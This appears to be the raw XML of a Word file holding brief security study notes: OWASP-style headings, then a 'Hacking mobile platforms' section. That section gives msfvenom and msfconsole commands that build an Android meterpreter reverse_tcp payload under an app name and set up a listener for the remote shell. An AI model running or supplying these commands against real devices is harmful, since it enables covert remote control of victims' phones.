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AC01" w14:textId="4D67EBB1" w:rsidR="00994390" w:rsidRDefault="005D7852" w:rsidP="005D785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26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9B879" w14:textId="43BF4A2F" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D785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Insecure Deserialization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8DBB01" w14:textId="5784CF3C" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Changing content of super cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F1A39" w14:textId="33A21E34" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D785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9. Using components with known vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6D7D77" w14:textId="02BAA6D5" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Components=libraries, features, frameworks, extensions etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9EDC5F" w14:textId="2C26D423" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Components having vulnerabilities leads to attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A51895" w14:textId="7624CEB7" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D785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 Insufficient logging and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B3DA9" w14:textId="3E05F2DA" w:rsidR="005D7852" w:rsidRDefault="005D7852" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Read hacky hack hack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05427449" w14:textId="6173B4E3" w:rsidR="00DA6AC8" w:rsidRDefault="00DA6AC8" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEF544A" w14:textId="08C2A814" w:rsidR="00DA6AC8" w:rsidRDefault="00DA6AC8" w:rsidP="005D785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Hacking mobile platforms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB6C42F" w14:textId="1E616604" w:rsidR="00DA6AC8" w:rsidRDefault="00DA6AC8" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6AC8">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>within the network only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1993766E" w14:textId="550C35D0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In kali linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079505E" w14:textId="7EF0A4B9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ab/>
        <w:t>Msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992944E" w14:textId="4EC38612" w:rsidR="00DA6AC8" w:rsidRDefault="00DA6AC8" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DFB477E" w14:textId="560E80AF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-sudo su</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B8C90" w14:textId="129E0697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-msfvenom -p android/meterpreter/reverse_tcp LHOST=&lt;ipaddress&gt; LPORT=4444 R &gt; &lt;android app name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536F8986" w14:textId="78FBBC22" w:rsidR="00DA6AC8" w:rsidRDefault="00DA6AC8" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C6D581D" w14:textId="00C5F9F9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-msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46138765" w14:textId="5EE3B5B8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&gt;msf5 &gt;use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BF328E" w14:textId="2AE8A8B0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&gt;msf5 exploit(multi/handler) &gt;show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C3A0F" w14:textId="3ABB37A7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&gt;msf5 exploit(multi/handler) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> set payload android /meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B52C76D" w14:textId="30AA8A05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&gt;msf5 …………………………………..&gt;show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D9D2A" w14:textId="71970F38" w:rsidR="00DA6AC8" w:rsidRDefault="00DA6AC8" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;msf5 …………………………………...&gt;</w:t>
      </w:r>
      <w:r w:rsidR="002B0666">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set LHOST &lt;kali ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2FC1AB" w14:textId="2E5CACBB" w:rsidR="002B0666" w:rsidRDefault="002B0666" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;msf5 ……………………………………..&gt; set LPORT &lt;any port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345B4CA3" w14:textId="4430921E" w:rsidR="002B0666" w:rsidRPr="00DA6AC8" w:rsidRDefault="002B0666" w:rsidP="005D7852">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;msf5 ………………………………………&gt;exploit or run</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002B0666" w:rsidRPr="00DA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9E"/>
    <w:rsid w:val="002B0666"/>
    <w:rsid w:val="005D7852"/>
    <w:rsid w:val="00994390"/>
    <w:rsid w:val="00DA6AC8"/>
    <w:rsid w:val="00F5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B18B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{79C93A26-0163-464F-848B-631CAA44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2023-03-07T18:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-07T18:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>